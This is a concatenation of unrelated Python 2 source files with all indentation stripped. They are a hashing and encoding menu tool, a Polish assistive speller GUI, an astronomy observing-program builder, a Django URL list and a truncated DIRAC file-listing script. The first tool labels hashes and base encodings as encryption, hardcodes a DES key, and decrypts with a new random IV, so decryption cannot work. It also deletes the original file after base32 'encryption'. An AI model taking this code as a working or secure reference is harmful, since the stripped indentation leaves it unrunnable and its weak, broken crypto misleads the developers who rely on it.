nama_file.writelines(cipher_text)
nama_file.close()
time.sleep(2)
for i in(5,4,3,2,1):
print "[*] encrypted at",now
print "\n[*] saved into text.encrypt"
menu_item="base16"
if menu_item == raw:
telo=raw_input('[*] text $ ')
base16=base64.b16encode('%s' % (telo))
for i in(5,4,3,2,1):
print "[*] encoded at",now
print "\n[*] result :",base16
menu_item="sha224"
if menu_item == raw:
telo=raw_input('[*] text $ ')
sha224=hashlib.sha224('%s' % (telo)).hexdigest()
for i in(5,4,3,2,1):
print "[*] encrypted at",now
print "\n[*] result :",sha224
menu_item="sha384"
if menu_item == raw:
telo=raw_input('[*] text $ ')
sha384=hashlib.sha384('%s' % (telo)).hexdigest()
for i in(5,4,3,2,1):
print "[*] encrypted at",now
print "\n[*] result :",sha384
menu_item="sha512"
if menu_item == raw:
telo=raw_input('[*] text $ ')
sha512=hashlib.sha512('%s' % (telo)).hexdigest()
for i in(5,4,3,2,1):
print "[*] encrypted at",now
print "\n[*] result :",sha512
menu_item="base64"
if menu_item == raw:
telo=raw_input('[*] text $ ')
base64=base64.b64encode('%s' % (telo))
for i in(5,4,3,2,1):
print "[*] encoded at",now
print "\n[*] result :",base64
menu_item="md5"
if menu_item == raw:
telo=raw_input('[*] text $ ')
md5=hashlib.md5('%s' % (telo)).hexdigest()
for i in(1,2,3,4,5):
print "[*] encrypted at",now
print "\n[*] result :",md5
menu_item="sha256"
if menu_item == raw:
telo=raw_input('[*] text $ ')
sha256=hashlib.sha256('%s' % (telo)).hexdigest()
print
for i in(1,2,3,4,5):
print "[*] encrypted at",now
print "\n[*] result :",sha256
menu_item="sha1"
if menu_item == raw:
telo=raw_input('[*] text $ ')
sha1=hashlib.sha1('%s' % (telo)).hexdigest()
print
for i in(1,2,3,4,5):
print "[*] encrypted at",now
print "\n[*] result :",sha1
menu_item="base32"
if menu_item == raw:
ff=raw_input('[*] text or file $ ')
menu_fuck="text"
if menu_fuck == ff:
telo=raw_input('text $ ')
base32=base64.b32encode('%s' % (telo))
print
for i in(1,2,3,4,5):
print "[*] encoded at",now
print "\n[*] result :",base32
menu_ss="file"
if menu_ss == ff:
try:
print "[*] WARNING : if you encrypt this file your file original will be remove !"
fileno=raw_input('\n[*] file to encrypt $ ')
baca=open('%s' % (fileno), 'r')
ss=baca.read()
decrypt=base64.b32encode(ss)
simpan=open('text.enc','w')
simpan.writelines(decrypt)
simpan.close()
time.sleep(2)
for i in(5,4,3,2,1):
print "[*] encoded at",now
print "\n[*] saved to text.enc"
os.remove(fileno)
except IOError:
print "\n[*] no file found",fileno
sys.exit()
menu_telo="decrypt"
if menu_telo == menu:
print
print "----> base16"
print "----> base32"
print "----> base64"
print "----> cryptoDES"
print
oke=raw_input('[*] type and choice one $ ')
menu_telo="cryptoDES"
if menu_telo == oke:
try:
telo=raw_input('[*] file.encrypt : ')
iv=Random.get_random_bytes(8)
des1=DES.new('01234567', DES.MODE_CFB, iv)
des2=DES.new('01234567', DES.MODE_CFB, iv)
nama_file=open('%s' % (telo),'r')
ss=nama_file.read()
decs=des2.decrypt(ss)
save1=open('text.decrypt','w')
save1.writelines(decs)
save1.close()
time.sleep(2)
for i in(5,4,3,2,1):
print "[*] decrypted at",now
print "\n[*] saved file text.decrypt"
except IOError:
print "\n[*] Not found file encrypt",telo
menu_telo="base16"
if oke == menu_telo:
raw1=raw_input('[*] text base16 $ ')
dec16=base64.b16decode('%s' % (raw1))
for i in(5,4,3,2,1):
print "[*] decoded at",now
print "\n[*] result :",dec16
menu_telo="base32"
if oke == menu_telo:
ss=raw_input('[*] text or file $ ')
menu_gg="text"
if menu_gg == ss:
raw2=raw_input('[*] text base32 $ ')
print
dec32=base64.b32decode('%s' % (raw2))
for i in(5,4,3,2,1):
print "[*] decoded at",now
print "\n[*] result :",dec32
menu_hh="file"
if menu_hh == ss:
try:
fileno=raw_input('[*] file text.enc $ ')
print
fuck=open('%s' % (fileno), 'r')
anjir=fuck.read()
dec43=base64.b32decode(anjir)
telo=open('text.dec','w')
telo.writelines(dec43)
telo.close()
time.sleep(2)
for i in(5,4,3,2,1):
print "[*] decoded at",now
print "\n[*] save file text.dec"
os.remove(fileno)
except:
print "[*] Not found file enc "
menu_telo="base64" #this is Bug Sorry
if oke == menu_telo:#
raw3=raw_input('[*] text base64 $ ')#
dec64=base64.b64decode('%s' % (raw3))#
for i in (5,4,3,2,1):#
print "[*] decoded at",now#
print "\n[*] result :",dec64#
menu_telo="exit"
if menu_telo == oke:
print "[*] thanks for shopping"
sys.exit()
menu_item="exit"
if menu == menu_item:
print "[*] thanks for shopping"
sys.exit()
except KeyboardInterrupt:
print "\n[*] ctrl+c active "
sys.exit()
|
import wxversion
wxversion.select( '2.8' )
import glob, os, time
import wx, alsaaudio
import wx.lib.buttons as bt
from pymouse import PyMouse
from string import maketrans
from pygame import mixer
import subprocess as sp
import shlex
import numpy as np
from random import shuffle
class speller( wx.Frame ):
def __init__(self, parent):
self.parent = parent
self.initializeParameters( )
self.initializeBitmaps( )
self.createGui( )
#-------------------------------------------------------------------------
def initializeParameters(self):
self.pathToEPlatform = './'
with open( self.pathToEPlatform + 'spellerParameters', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'polishLettersColour':
self.polishLettersColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'voice':
pass
elif line[ :line.find('=')-1 ] == 'vowelColour':
self.vowelColour= line[ line.rfind('=')+2:-1 ]
elif not line.isspace( ):
print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
self.vowelColour = 'red'
self.polishLettersColour = 'blue'
with open( self.pathToEPlatform + 'parametersCW', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'textSize':
pass
elif line[ :line.find('=')-1 ] == 'checkTime':
pass
elif line[ :line.find('=')-1 ] == 'maxPoints':
pass
elif line[ :line.find('=')-1 ] == 'colorGrat':
pass
elif line[ :line.find('=')-1 ] == 'colorNiest':
pass
elif line[ :line.find('=')-1 ] == 'ileLuk':
pass
#self.ileLuk= int(line[ line.rfind('=')+2:-1 ])
elif not line.isspace( ):
print 'Niewłaściwie opisane parametry'
print 'Błąd w linii', line
#self.ileLuk=2
with open( self.pathToEPlatform + 'parameters', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'timeGap':
self.timeGap = int( line[ line.rfind('=')+2:-1 ] )
elif line[ :line.find('=')-1 ] == 'backgroundColour':
self.backgroundColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'textColour':
self.textColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'scanningColour':
self.scanningColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'selectionColour':
self.selectionColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'musicVolume':
pass
elif line[ :line.find('=')-1 ] == 'filmVolume':
pass
elif not line.isspace( ):
print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
self.timeGap = 1500
self.backgroundColour = 'white'
self.textColour = 'black'
self.scanningColour = '#E7FAFD'
self.selectionColour = '#9EE4EF'
self.labels = [ 'a e b c d f g h i o j k l m n p u y r s t w z SPECIAL_CHARACTERS DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ), '1 2 3 4 5 6 7 8 9 0 + - * / = % $ & . , ; : " ? ! @ # ( ) [ ] { } < > ~ DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ) ]
self.colouredLabels = [ 'a','e','i','o','u','y']
self.winWidth, self.winHeight = wx.DisplaySize( )
self.voice=False
self.slowo=self.parent.word
self.ileLiter =len(self.slowo)
#if self.ileLuk >=len(self.slowo):
#self.ileLuk=len(self.slowo)-1
self.numberOfRows = [4, 5 ]
self.numberOfColumns = [ 8, 9 ]
#self.flag = 'row'
#self.rowIteration = 0
#self.columnIteration = 0
#self.countRows = 0
#self.countColumns = 0
self.kolejnyKrok=0
#self.maxNumberOfColumns = 2
self.numberOfPresses = 1
self.subSizerNumber = 0
self.mouseCursor = PyMouse( )
mixer.init( )
self.typewriterKeySound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_key.wav' )
self.typewriterForwardSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_forward.wav' )
self.typewriterSpaceSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_space.wav' )
self.phones = glob.glob( self.pathToEPlatform+'sounds/phone/*' )
self.phoneLabels = [ item[ item.rfind( '/' )+1 : item.rfind( '_' ) ] for item in self.phones ]
self.sounds = [ mixer.Sound( self.sound ) for self.sound in self.phones ]
self.parent.SetBackgroundColour( 'dark grey' )
#-------------------------------------------------------------------------
def initializeBitmaps(self):
self.path=self.pathToEPlatform+'multimedia/'
labelFiles = [ file for file in [ self.path+'icons/speller/special_characters.png', self.path+'icons/speller/DELETE.png', self.path+'icons/speller/TRASH.png', self.path+'icons/speller/CHECK.png',self.path+'icons/speller/ORISPEAK.png', self.path+'icons/speller/SPEAK.png', self.path+'icons/speller/exit.png', ] ]
self.labelBitmaps = { }
labelBitmapIndex = [ self.labels[ 0 ].index( self.labels[ 0 ][ -7 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -6 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -5 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -4 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -3 ] ),self.labels[ 0 ].index( self.labels[ 0 ][ -2 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -1 ] ) ]
for labelFilesIndex, labelIndex in enumerate( labelBitmapIndex ):
self.labelBitmaps[ self.labels[ 0 ][ labelIndex ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ labelFilesIndex ], 'rb' )) )
self.labelBitmaps2 = { }
labelBitmapIndex2 = [ self.labels[ 1 ].index( self.labels[ 1 ][ -6 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -5 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -4 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -3 ] ),self.labels[ 1 ].index( self.labels[ 1 ][ -2 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -1 ] ) ]
for labelFilesIndex2, labelIndex2 in enumerate( labelBitmapIndex2 ):
self.labelBitmaps2[ self.labels[ 1 ][ labelIndex2 ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ 1: ][ labelFilesIndex2 ], 'rb' )) )
#-------------------------------------------------------------------------
def createGui(self):
self.textField = wx.TextCtrl( self.parent, style = wx.TE_LEFT|wx.TE_RICH2, size = ( self.winWidth, 0.2 * self.winHeight ) )
self.textField.SetFont( wx.Font( 60, wx.SWISS, wx.NORMAL, wx.NORMAL ) )
self.parent.mainSizer.Add( self.textField, flag = wx.EXPAND | wx.TOP | wx.BOTTOM, border = 3 )
self.subSizers = [ ]
subSizer = wx.GridBagSizer( 3, 3 )
self.pomieszane=[]
for i in self.slowo:
self.pomieszane.append(self.labels[0].index(i))
shuffle(self.pomieszane)
#print self.pomieszane
for litera in self.pomieszane:
if self.pomieszane.count(litera) > 1:
self.pomieszane.remove(litera)
zakres=(self.numberOfRows[0]-1)* self.numberOfColumns[0] -1
print zakres
dodaj=np.random.randint(0,zakres,1)[0]
while dodaj in self.pomieszane:
dodaj=np.random.randint(0,zakres,1)[0]
self.pomieszane.append(dodaj)
slowoList=list(self.slowo)
shuffle(slowoList)
zmieszane_slowo= ''.join(slowoList)
#print zmieszane_slowo
for i in self.pomieszane:
self.labels[0][i]=zmieszane_slowo[-1]
zmieszane_slowo=zmieszane_slowo[:-1]
self.pomieszane.sort()
ile=0
for index_1, item in enumerate( self.labels[ 0 ][ :-7 ] ):
ile+=1
b = bt.GenButton( self.parent, -1, item , name = item+str(ile), size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) )
b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
b.SetBezelWidth( 3 )
if index_1 not in self.pomieszane:
b.SetBackgroundColour( 'grey' )
else:
b.SetBackgroundColour( self.backgroundColour )
if item in self.colouredLabels and self.vowelColour != 'False':
if index_1 not in self.pomieszane:
b.SetForegroundColour( 'grey' )
else:
b.SetForegroundColour( self.vowelColour )
else:
if index_1 not in self.pomieszane:
b.SetForegroundColour( 'grey' )
else:
b.SetForegroundColour( self.textColour )
b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
subSizer.Add( b, ( index_1 / self.numberOfColumns[ 0 ], index_1 % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
for index_2, item in enumerate( self.labels[ 0 ][ -7 : ] ):
if item == 'SPECIAL_CHARACTERS':
b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) )
b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
b.SetForegroundColour( 'grey' )
b.SetBackgroundColour( 'grey' )
else:
b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps[ item ] )
b.SetBackgroundColour( self.backgroundColour )
b.SetBezelWidth( 3 )
b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
if index_2==3:
subSizer.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 0 ], ( index_1 + index_2+1 ) % self.numberOfColumns[ 0 ] ), (1,3), wx.EXPAND )
elif index_2>3:
subSizer.Add( b, ( ( index_1 + index_2 +3) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +3) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
else:
subSizer.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
self.subSizers.append( subSizer )
self.parent.mainSizer.Add( self.subSizers[ 0 ], proportion = 1, flag = wx.EXPAND )
self.parent.SetSizer( self.parent.mainSizer )
subSizer2 = wx.GridBagSizer( 3, 3 )
for index_1, item in enumerate( self.labels[ 1 ][ :-6 ] ):
b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 1 ], 0.75 * self.winHeight / self.numberOfRows[ 1 ] ) )
b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
b.SetBezelWidth( 3 )
b.SetBackgroundColour( self.backgroundColour )
b.SetForegroundColour( self.textColour )
b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
subSizer2.Add( b, ( index_1 / self.numberOfColumns[ 1 ], index_1 % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
for index_2, item in enumerate( self.labels[ 1 ][ -6 : ] ):
b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps2[ item ] )
b.SetBackgroundColour( self.backgroundColour )
b.SetBezelWidth( 3 )
b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
if index_2==2:
subSizer2.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), (1,4), wx.EXPAND )
elif index_2>2:
subSizer2.Add( b, ( ( index_1 + index_2 +4) / self.numberOfColumns[ 1], ( index_1 + index_2+4 ) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
else:
subSizer2.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
self.subSizers.append( subSizer2 )
self.parent.mainSizer.Add( self.subSizers[ 1 ], proportion = 1, flag = wx.EXPAND )
self.parent.mainSizer.Show( item = self.subSizers[ 1 ], show = False, recursive = True )
self.parent.SetSizer( self.parent.mainSizer )
ikony=range(self.numberOfColumns[0]*self.numberOfRows[0]-8,self.numberOfColumns[0]*self.numberOfRows[0]-2)
self.ktore=self.pomieszane
for i in ikony:
self.ktore.append(i)
self.parent.Layout()
self.usuniete=[]
def onExit(self):
self.parent.PicNr-=1
self.parent.stoper2.Stop( )
self.parent.back()
def czytajLitere(self,litera):
time.sleep(1)
soundIndex = self.phoneLabels.index( [ item for item in self.phoneLabels if litera.swapcase() in item ][ 0 ] )
sound = self.sounds[ soundIndex ]
sound.play( )
self.parent.SetFocus()
#----------------------------------------------------------------------------
def onPress(self, event):
self.numberOfPresses += 1
if self.numberOfPresses == 1:
label = self.labels[ 0 ][self.ktore[self.kolejnyKrok-1]]
item = self.subSizers[ 0 ].GetChildren()
b = item[self.ktore[self.kolejnyKrok-1]]
b=b.GetWindow( )
if label != 'SPEAK':
b.SetBackgroundColour( self.selectionColour )
else:
pass
b.SetFocus( )
b.Update( )
if label in self.slowo:
self.typewriterKeySound.play()
self.textField.WriteText(label)
item = self.subSizers[ 0 ].GetChildren()
b = item[self.ktore[self.kolejnyKrok-1]]
b=b.GetWindow( )
b.SetBackgroundColour( 'grey' )
b.SetForegroundColour('grey')
b.SetFocus( )
b.Update( )
self.usuniete.append(self.ktore[self.kolejnyKrok-1])
self.ktore.remove( self.ktore[self.kolejnyKrok-1] )
self.kolejnyKrok=0
elif label == 'DELETE':
text=self.textField.GetValue()
if text:
self.typewriterForwardSound.play( )
item = self.subSizers[ 0 ].GetChildren()
b = item[self.usuniete[-1]]
b=b.GetWindow( )
b.SetBackgroundColour( self.backgroundColour)
if self.labels[0][self.usuniete[-1]] in self.colouredLabels:
b.SetForegroundColour( self.vowelColour )
else:
b.SetForegroundColour( self.textColour )
b.SetFocus( )
b.Update( )
self.ktore.append(self.usuniete[-1])
self.ktore.sort()
self.usuniete.remove( self.usuniete[-1] )
self.textField.Remove(self.textField.GetInsertionPoint()-1, self.textField.GetInsertionPoint())
self.kolejnyKrok=0
else:
pass
elif label == 'SPEAK':
if not self.voice:
self.voice=True
b.SetBackgroundColour('indian red')
b.SetFocus( )
b.Update()
else:
b.SetBackgroundColour(self.backgroundColour)
b.SetFocus( )
b.Update()
self.voice=False
elif label == 'ORISPEAK':
self.parent.stoper2.Stop()
if str(self.parent.word)+'.ogg' not in os.listdir(self.pathToEPlatform+'multimedia/spelling/'):
command='sox -m '+self.pathToEPlatform+'sounds/phone/'+list(self.parent.word)[0].swapcase()+'.wav'
ile=0
for l in list(self.parent.word)[1:]:
ile+=2
command+=' "|sox '+self.pathToEPlatform+'sounds/phone/'+l.swapcase()+'.wav'+' -p pad '+str(ile)+'"'
command+=' '+self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg'
wykonaj=sp.Popen(shlex.split(command))
time.sleep(1.5)
do_literowania=mixer.Sound(self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg')
do_literowania.play()
self.parent.stoper4.Start((do_literowania.get_length()+0.5 )* 1000)
elif label == 'TRASH':
text=self.textField.GetValue()
if text:
self.typewriterForwardSound.play()
self.textField.Remove(0,self.textField.GetInsertionPoint())
for litera in self.usuniete:
item = self.subSizers[ 0 ].GetChildren()
b = item[litera]
b=b.GetWindow( )
b.SetBackgroundColour( self.backgroundColour)
if self.labels[0][litera] in self.colouredLabels:
b.SetForegroundColour( self.vowelColour )
else:
b.SetForegroundColour( self.textColour )
#print self.usuniete,self.ktore
b.SetFocus( )
b.Update( )
while self.usuniete:
self.ktore.append(self.usuniete[-1])
self.ktore.sort()
self.usuniete.remove(self.usuniete[-1] )
self.kolejnyKrok=0
else:
pass
elif label == 'EXIT':
self.onExit( )
elif label =='CHECK':
self.parent.stoper2.Stop()
self.parent.ownWord=self.textField.GetValue()
self.parent.check()
else:
pass
else:
event.Skip( )
#-------------------------------------------------------------------------
def timerUpdate(self, event):
self.mouseCursor.move( self.winWidth - 12, self.winHeight - 20 )
self.numberOfPresses = 0
for i in self.ktore:
if self.voice and i == self.numberOfRows[0]*self.numberOfColumns[0]-4:
items = self.subSizers[ 0 ].GetChildren()
b = items[i]
b=b.GetWindow( )
b.SetBackgroundColour( 'indian red')
b.SetFocus( )
b.Update( )
else:
items = self.subSizers[ 0 ].GetChildren()
b = items[i]
b=b.GetWindow( )
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus( )
b.Update( )
if self.voice and self.ktore[self.kolejnyKrok] == self.numberOfRows[0]*self.numberOfColumns[0]-4:
item = self.subSizers[ 0 ].GetChildren()
b = item[self.ktore[self.kolejnyKrok]]
b=b.GetWindow( )
b.SetBackgroundColour( 'orange red')
b.SetFocus( )
b.Update( )
else:
item = self.subSizers[ 0 ].GetChildren()
b = item[self.ktore[self.kolejnyKrok]]
b=b.GetWindow( )
b.SetBackgroundColour( self.scanningColour)
b.SetFocus( )
b.Update( )
if self.voice and self.labels[0][self.ktore[self.kolejnyKrok]] in self.slowo:
self.parent.stoper2.Stop()
label = self.labels[ 0 ][self.ktore[self.kolejnyKrok]]
self.czytajLitere(label)
self.parent.stoper2.Start(self.timeGap)
if self.kolejnyKrok == len(self.ktore)-1:
self.kolejnyKrok=0
else:
self.kolejnyKrok+=1
|
import json
import argparse
import numpy
import sys
import copy
from astropy.coordinates import SkyCoord
from astropy import units
import operator
class Program(object):
def __init__(self, runid="16BP06", pi_login="gladman"):
self.config = {"runid": runid,
"pi_login": pi_login,
"program_configuration": {"mjdates": [],
"observing_blocks": [],
"observing_groups": []
}}
def add_target(self, target):
self.config["program_configuration"]["mjdates"].append(target)
def add_observing_block(self, observing_block):
self.config["program_configuration"]["observing_blocks"].append(observing_block)
def add_observing_group(self, observing_group):
self.config["program_configuration"]["observing_groups"].append(observing_group)
class Target(object):
def __init__(self, filename=None):
self.config = json.load(open(filename))
@property
def token(self):
return self.config["identifier"]["client_token"]
@property
def mag(self):
return self.config["moving_target"]["ephemeris_points"][0]["mag"]
@property
def coordinate(self):
return SkyCoord(self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["ra"],
self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["dec"],
unit='degree')
class ObservingBlock(object):
def __init__(self, client_token, target_token):
self.config = {"identifier": {"client_token": client_token},
"target_identifier": {"client_token": target_token},
"constraint_identifiers": [{"server_token": "C1"}],
"instrument_config_identifiers": [{"server_token": "I1"}]}
@property
def token(self):
return self.config["identifier"]["client_token"]
class ObservingGroup(object):
def __init__(self, client_token):
self.config = {"identifier": {"client_token": client_token},
"observing_block_identifiers": []}
def add_ob(self, client_token):
self.config["observing_block_identifiers"].append({"client_token": client_token})
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('ogname')
parser.add_argument('mjdates', nargs='+')
args = parser.parse_args()
# Break the mjdates into OBs based on their max mag of source in pointing.
cuts = numpy.array([23.0, 23.5, 24.0, 24.5, 25.0, 25.5, 26.0, 30.0])
IC_exptimes = [50, 100, 200, 300, 400, 500, 600, 700]
program = Program()
ob_tokens = []
mags = {}
ob_coordinate = {}
for filename in args.mjdates:
target = Target(filename)
program.add_target(target.config)
ob_token = "OB-{}-{}".format(target.token, target.mag)
ob = ObservingBlock(ob_token, target.token)
idx = (target.mag > cuts).sum() + 4
ob.config["instrument_config_identifiers"] = [{"server_token": "I{}".format(idx)}]
program.add_observing_block(ob.config)
ob_tokens.append(ob_token)
mags[ob_token] = target.mag
ob_coordinate[ob_token] = target.coordinate
sf = lambda x, y: cmp(x.ra, y.ra)
order_tokens = sorted(ob_coordinate, cmp=sf, key=ob_coordinate.get)
total_itime = 0
ogs = {}
scheduled = {}
og_idx = 0
while len(scheduled) < len(ob_tokens):
og_idx += 1
og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, 0)
sys.stdout.write("{}: ".format(og_token))
og = ObservingGroup(og_token)
og_coord = None
og_itime = 0
for ob_token in order_tokens:
if ob_token not in scheduled:
if og_coord is None:
og_coord = ob_coordinate[ob_token]
if ob_coordinate[ob_token].separation(og_coord) > 30 * units.degree:
continue
og.add_ob(ob_token)
scheduled[ob_token] = True
sys.stdout.write("{} ".format(ob_token))
sys.stdout.flush()
idx = (mags[ob_token] > cuts).sum()
print ob_token, mags[ob_token], idx + 4
og_itime += IC_exptimes[idx] + 40
if og_itime > 3000.0:
break
break
total_itime += og_itime
sys.stdout.write(" {}s \n".format(og_itime))
program.add_observing_group(og.config)
nrepeats = 0
for repeat in range(nrepeats):
total_itime += og_itime
og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, repeat + 1)
og = copy.deepcopy(og)
og.config["identifier"]["client_token"] = og_token
program.add_observing_group(og.config)
print "Total I-Time: {} hrs".format(total_itime/3600.)
json.dump(program.config, open('program.json', 'w'), indent=4, sort_keys=True)
|
from django.conf.urls import url
from . import views
app_name = "perso"
urlpatterns = [
url(r'^$', views.main, name='main'),
url(r'^(?P<pageId>[0-9]+)/?$', views.main, name='main'),
url(r'^about/?$', views.about, name='about'),
url(r'^contact/?$', views.contact, name='contact'),
url(r'^(?P<cat_slug>[-a-zA-Z0-9_]+)/?$', views.main, name='main'),
url(r'^(?P<cat_slug>[-a-zA-Z0-9_]+)/(?P<pageId>[0-9]+)/?$', views.main, name='main'),
url(r'^publication/(?P<slug>[-a-zA-Z0-9_]+)/?$', views.publication, name='publication'),
url(r'^tag/(?P<slug>[-a-zA-Z0-9_]+)/?$', views.tag, name='tag'),
]
|
"""
Get the list of all the user files.
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Base import Script
days = 0
months = 0
years = 0
wildcard = None
baseDir = ''
emptyDirsFlag = False
Script.registerSwitch( "D:", "Days=", "Match files older than number of days [%s]" % days )
Script.registerSwitch( "M:", "Months=", "Match files older than number of months [%s]" % months )
Script.registerSwitch( "Y:", "Years=", "Match files older than number of years [%s]" % years )
Script.registerSwitch( "w:", "Wildcard=", "Wildcard for matching filenames [All]" )
Script.registerSwitch( "b:", "BaseDir=", "Base directory to begin search (default /[vo]/user/[initial]/[username])" )
Script.registerSwitch( "e", "EmptyDirs", "Create a list of empty directories" )
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'Usage:',
' %s [option|cfgfile] ...' % Script.scriptName, ] ) )
Script.parseCommandLine( ignoreErrors = False )
for switch in Script.getUnprocessedSwitches():
if switch[0] == "D" or switch[0].lower() == "days":
days = int( switch[1] )
if switch[0] == "M" or switch[0].lower() == "months":
months = int( switch[1] )
if switch[0] == "Y" or switch[0].lower() == "years":
years = int( switch[1] )
if switch[0].lower() == "w" or switch[0].lower() == "wildcard":
wildcard = switch[1]
if switch[0].lower() == "b" or switch[0].lower() == "basedir":
baseDir = switch[1]
if switch[0].lower() == "e" or switch[0].lower() == "emptydirs":
emptyDirsFlag = True
import DIRAC
from DIRAC import gLogger
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.Core.Utilities.List import sortList
from datetime import datetime, timedelta
import sys, os, time, fnmatch
fc = FileCatalog()
def isOlderThan( cTimeStruct, days ):
timeDelta = timedelta( days = days )
maxCTime = datetime.utcnow() - timeDelta
if cTimeStruct < maxCTime:
return True
return False
withMetadata = False
if days or months or years:
withMetadata = True
totalDays = 0
if years:
totalDays += 365 * years
if months:
totalDays += 30 * months
if days:
totalDays += days
res = getProxyInfo( False, False )
if not res['OK']:
gLogger.error( "Failed to get client proxy information.", res['Message'] )
DIRAC.exit( 2 )
proxyInfo = res['Value']
username = proxyInfo['username']
vo = ''
if 'group' in proxyInfo:
vo = getVOForGroup( proxyInfo['group'] )
if not baseDir:
if not vo:
gLogger.error( 'Could not determine VO' )
Script.showHelp()
baseDir = '/%s/user/%s/%s' % ( vo, username[0], username )
baseDir = baseDir.rstrip( '/' )
gLogger.info( 'Will search for files in %s' % baseDir )
activeDirs = [baseDir]
allFiles = []
emptyDirs = []
while len( activeDirs ) > 0:
currentDir = activeDirs.pop()
res = fc.listDirectory( currentDir, withMetadata, timeout = 360 )
if not res['OK']:
gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Message'] ) )
elif currentDir in res['Value']['Failed']:
gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Value']['Failed'][currentDir] ) )
else:
dirContents = res['Value']['Successful'][currentDir]
subdirs = dirContents['SubDirs']
files = dirContents['Files']
if not subdirs and not files:
emptyDirs.append( currentDir )
gLogger.notice( '%s: empty directory' % currentDir )
else:
for subdir in sorted( subdirs, reverse = True ):
if ( not withMetadata ) or isOlderThan( subdirs[subdir]['CreationDate'], totalDays ):
activeDirs.append( subdir )
for filename in sorted( files ):
fileOK = False
if ( not withMetadata ) or isOlderThan( files[filename]['MetaData']['CreationDate'], totalDays ):
if wildcard is None or fnmatch.fnmatch( filename, wildcard ):
fileOK = True
if not fileOK:
files.pop( filename )
allFiles += sorted( files )
gLogger.notice( "%s: %d files%s, %d sub-directories" % ( currentDir, len( files ), ' matching' if withMetadata or wildcard else '', len( subdirs ) ) )
outputFileName = '%s.lfns' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' )
outputFile = open( outputFileName, 'w' )
for lfn in sortList( allFiles ):
outputFile.write( lfn + '\n' )
outputFile.close()
gLogger.notice( '%d matched files have been put in %s' % ( len( allFiles ), outputFileName ) )
if emptyDirsFlag:
outputFileName = '%s.emptydirs' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' )
outputFile = open( outputFileName, 'w' )
for dir in sortList( emptyDirs ):
